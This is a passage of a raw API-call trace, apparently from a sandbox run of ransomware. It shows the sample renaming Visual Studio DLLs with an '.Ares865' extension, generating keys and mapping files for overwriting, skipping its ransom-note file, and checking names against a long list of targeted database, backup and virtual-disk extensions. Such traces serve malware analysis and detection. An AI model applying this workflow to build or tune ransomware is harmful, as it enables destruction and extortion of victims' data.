(HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0128.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0128.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0128.692] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.693] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.693] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.693] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x33aa0, lpName=0x0) returned 0x170 [0128.695] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x33aa0) returned 0x420000 [0128.734] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.735] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.735] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0128.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0128.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0128.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0128.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0128.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0128.736] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0128.736] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0128.736] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0128.736] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0128.736] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0128.738] CloseHandle (hObject=0x170) returned 1 [0128.738] CloseHandle (hObject=0x118) returned 1 [0128.738] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0128.738] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0128.738] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0128.739] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b54f00, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x526bacf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50b54f00, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x197b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0128.739] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.739] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll", lpString2="aoldtz.exe") returned 1 [0128.739] lstrcpyW (in: lpString1=0x2cce49c, lpString2="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll") returned="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll" [0128.739] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll") returned 58 [0128.739] lstrlenW (lpString="Ares865") returned 7 [0128.739] lstrcmpiW (lpString1="ger.dll", lpString2="Ares865") returned 1 [0128.739] lstrlenW (lpString=".dll") returned 4 [0128.740] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll", lpString2=".dll") returned 1 [0128.740] lstrlenW (lpString=".lnk") returned 4 [0128.740] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll", lpString2=".lnk") returned 1 [0128.740] lstrlenW (lpString=".ini") returned 4 [0128.740] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll", lpString2=".ini") returned 1 [0128.740] lstrlenW (lpString=".sys") returned 4 [0128.740] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll", lpString2=".sys") returned 1 [0128.740] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll") returned 58 [0128.740] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll.Ares865") returned 144 [0128.740] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.addinmanager.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.addinmanager.dll.ares865"), dwFlags=0x1) returned 1 [0128.744] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.addinmanager.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.744] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=104368) returned 1 [0128.744] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0128.744] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0128.744] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0128.744] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.745] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.745] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.745] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x19ab0, lpName=0x0) returned 0x170 [0128.752] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19ab0) returned 0x190000 [0128.800] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.801] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.801] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0128.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0128.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0128.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0128.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0128.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0128.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0128.802] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0128.802] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0128.802] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0128.802] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0128.803] CloseHandle (hObject=0x170) returned 1 [0128.803] CloseHandle (hObject=0x118) returned 1 [0128.803] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0128.803] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0128.803] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0128.804] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57dc5d00, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x6104dbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x57dc5d00, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x97b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0128.804] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.804] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll", lpString2="aoldtz.exe") returned 1 [0128.804] lstrcpyW (in: lpString1=0x2cce49c, lpString2="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll") returned="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll" [0128.804] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll") returned 59 [0128.804] lstrlenW (lpString="Ares865") returned 7 [0128.804] lstrcmpiW (lpString1="nel.dll", lpString2="Ares865") returned 1 [0128.804] lstrlenW (lpString=".dll") returned 4 [0128.804] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll", lpString2=".dll") returned 1 [0128.804] lstrlenW (lpString=".lnk") returned 4 [0128.804] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll", lpString2=".lnk") returned 1 [0128.804] lstrlenW (lpString=".ini") returned 4 [0128.804] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll", lpString2=".ini") returned 1 [0128.804] lstrlenW (lpString=".sys") returned 4 [0128.804] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll", lpString2=".sys") returned 1 [0128.804] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll") returned 59 [0128.805] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll.Ares865") returned 145 [0128.805] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.comrpcchannel.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.comrpcchannel.dll.ares865"), dwFlags=0x1) returned 1 [0128.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.comrpcchannel.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.816] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=38832) returned 1 [0128.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0128.817] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0128.817] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0128.817] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.817] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.818] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.818] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9ab0, lpName=0x0) returned 0x170 [0128.820] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9ab0) returned 0x190000 [0128.827] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.828] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.828] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0128.828] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0128.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0128.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0128.828] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0128.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0128.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0128.828] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0128.828] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0128.828] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0128.828] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0128.829] CloseHandle (hObject=0x170) returned 1 [0128.829] CloseHandle (hObject=0x118) returned 1 [0128.829] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0128.829] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0128.829] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0128.829] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x590d8a00, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x52694b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x590d8a00, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x117a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0128.829] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.829] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll", lpString2="aoldtz.exe") returned 1 [0128.830] lstrcpyW (in: lpString1=0x2cce49c, lpString2="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll") returned="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll" [0128.830] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll") returned 56 [0128.830] lstrlenW (lpString="Ares865") returned 7 [0128.830] lstrcmpiW (lpString1="ime.dll", lpString2="Ares865") returned 1 [0128.830] lstrlenW (lpString=".dll") returned 4 [0128.830] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll", lpString2=".dll") returned 1 [0128.830] lstrlenW (lpString=".lnk") returned 4 [0128.830] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll", lpString2=".lnk") returned 1 [0128.830] lstrlenW (lpString=".ini") returned 4 [0128.830] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll", lpString2=".ini") returned 1 [0128.830] lstrlenW (lpString=".sys") returned 4 [0128.830] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll", lpString2=".sys") returned 1 [0128.830] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll") returned 56 [0128.830] lstrlenW (lpString="bak") returned 3 [0128.830] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0128.830] lstrlenW (lpString="ba_") returned 3 [0128.830] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0128.830] lstrlenW (lpString="dbb") returned 3 [0128.830] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0128.830] lstrlenW (lpString="vmdk") returned 4 [0128.830] lstrcmpiW (lpString1=".dll", lpString2="vmdk") returned -1 [0128.830] lstrlenW (lpString="rar") returned 3 [0128.830] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0128.830] lstrlenW (lpString="zip") returned 3 [0128.830] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0128.830] lstrlenW (lpString="tgz") returned 3 [0128.831] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0128.831] lstrlenW (lpString="vbox") returned 4 [0128.831] lstrcmpiW (lpString1=".dll", lpString2="vbox") returned -1 [0128.831] lstrlenW (lpString="vdi") returned 3 [0128.831] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0128.831] lstrlenW (lpString="vhd") returned 3 [0128.831] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0128.831] lstrlenW (lpString="vhdx") returned 4 [0128.831] lstrcmpiW (lpString1=".dll", lpString2="vhdx") returned -1 [0128.831] lstrlenW (lpString="avhd") returned 4 [0128.831] lstrcmpiW (lpString1=".dll", lpString2="avhd") returned -1 [0128.831] lstrlenW (lpString="db") returned 2 [0128.831] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0128.831] lstrlenW (lpString="db2") returned 3 [0128.831] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0128.831] lstrlenW (lpString="db3") returned 3 [0128.831] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0128.831] lstrlenW (lpString="dbf") returned 3 [0128.831] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0128.831] lstrlenW (lpString="mdf") returned 3 [0128.831] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0128.831] lstrlenW (lpString="mdb") returned 3 [0128.831] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0128.831] lstrlenW (lpString="sql") returned 3 [0128.831] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0128.831] lstrlenW (lpString="sqlite") returned 6 [0128.831] lstrcmpiW (lpString1="me.dll", lpString2="sqlite") returned -1 [0128.831] lstrlenW (lpString="sqlite3") returned 7 [0128.831] lstrcmpiW (lpString1="ime.dll", lpString2="sqlite3") returned -1 [0128.831] lstrlenW (lpString="sqlitedb") returned 8 [0128.831] lstrcmpiW (lpString1="Time.dll", lpString2="sqlitedb") returned 1 [0128.831] lstrlenW (lpString="xml") returned 3 [0128.831] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0128.831] lstrlenW (lpString="$er") returned 3 [0128.831] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0128.832] lstrlenW (lpString="4dd") returned 3 [0128.832] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0128.832] lstrlenW (lpString="4dl") returned 3 [0128.832] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0128.832] lstrlenW (lpString="^^^") returned 3 [0128.832] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0128.832] lstrlenW (lpString="abs") returned 3 [0128.832] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0128.832] lstrlenW (lpString="abx") returned 3 [0128.832] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0128.832] lstrlenW (lpString="accdb") returned 5 [0128.832] lstrcmpiW (lpString1="e.dll", lpString2="accdb") returned 1 [0128.832] lstrlenW (lpString="accdc") returned 5 [0128.832] lstrcmpiW (lpString1="e.dll", lpString2="accdc") returned 1 [0128.832] lstrlenW (lpString="accde") returned 5 [0128.832] lstrcmpiW (lpString1="e.dll", lpString2="accde") returned 1 [0128.832] lstrlenW (lpString="accdr") returned 5 [0128.832] lstrcmpiW (lpString1="e.dll", lpString2="accdr") returned 1 [0128.832] lstrlenW (lpString="accdt") returned 5 [0128.832] lstrcmpiW (lpString1="e.dll", lpString2="accdt") returned 1 [0128.832] lstrlenW (lpString="accdw") returned 5 [0128.832] lstrcmpiW (lpString1="e.dll", lpString2="accdw") returned 1 [0128.832] lstrlenW (lpString="accft") returned 5 [0128.832] lstrcmpiW (lpString1="e.dll", lpString2="accft") returned 1 [0128.832] lstrlenW (lpString="adb") returned 3 [0128.832] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0128.832] lstrlenW (lpString="adb") returned 3 [0128.832] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0128.832] lstrlenW (lpString="ade") returned 3 [0128.832] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0128.832] lstrlenW (lpString="adf") returned 3 [0128.832] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0128.832] lstrlenW (lpString="adn") returned 3 [0128.832] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0128.833] lstrlenW (lpString="adp") returned 3 [0128.833] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0128.833] lstrlenW (lpString="alf") returned 3 [0128.833] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0128.833] lstrlenW (lpString="ask") returned 3 [0128.833] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0128.833] lstrlenW (lpString="btr") returned 3 [0128.833] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0128.833] lstrlenW (lpString="cat") returned 3 [0128.833] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0128.833] lstrlenW (lpString="cdb") returned 3 [0128.833] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0128.833] lstrlenW (lpString="ckp") returned 3 [0128.833] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0128.833] lstrlenW (lpString="cma") returned 3 [0128.833] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0128.833] lstrlenW (lpString="cpd") returned 3 [0128.833] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0128.833] lstrlenW (lpString="dacpac") returned 6 [0128.833] lstrcmpiW (lpString1="me.dll", lpString2="dacpac") returned 1 [0128.833] lstrlenW (lpString="dad") returned 3 [0128.833] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0128.833] lstrlenW (lpString="dadiagrams") returned 10 [0128.833] lstrcmpiW (lpString1="gnTime.dll", lpString2="dadiagrams") returned 1 [0128.833] lstrlenW (lpString="daschema") returned 8 [0128.833] lstrcmpiW (lpString1="Time.dll", lpString2="daschema") returned 1 [0128.833] lstrlenW (lpString="db-journal") returned 10 [0128.833] lstrcmpiW (lpString1="gnTime.dll", lpString2="db-journal") returned 1 [0128.833] lstrlenW (lpString="db-shm") returned 6 [0128.833] lstrcmpiW (lpString1="me.dll", lpString2="db-shm") returned 1 [0128.833] lstrlenW (lpString="db-wal") returned 6 [0128.833] lstrcmpiW (lpString1="me.dll", lpString2="db-wal") returned 1 [0128.833] lstrlenW (lpString="dbc") returned 3 [0128.833] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0128.834] lstrlenW (lpString="dbs") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0128.834] lstrlenW (lpString="dbt") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0128.834] lstrlenW (lpString="dbv") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0128.834] lstrlenW (lpString="dbx") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0128.834] lstrlenW (lpString="dcb") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0128.834] lstrlenW (lpString="dct") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0128.834] lstrlenW (lpString="dcx") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0128.834] lstrlenW (lpString="ddl") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0128.834] lstrlenW (lpString="dlis") returned 4 [0128.834] lstrcmpiW (lpString1=".dll", lpString2="dlis") returned -1 [0128.834] lstrlenW (lpString="dp1") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0128.834] lstrlenW (lpString="dqy") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0128.834] lstrlenW (lpString="dsk") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0128.834] lstrlenW (lpString="dsn") returned 3 [0128.834] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0128.834] lstrlenW (lpString="dtsx") returned 4 [0128.834] lstrcmpiW (lpString1=".dll", lpString2="dtsx") returned -1 [0128.834] lstrlenW (lpString="dxl") returned 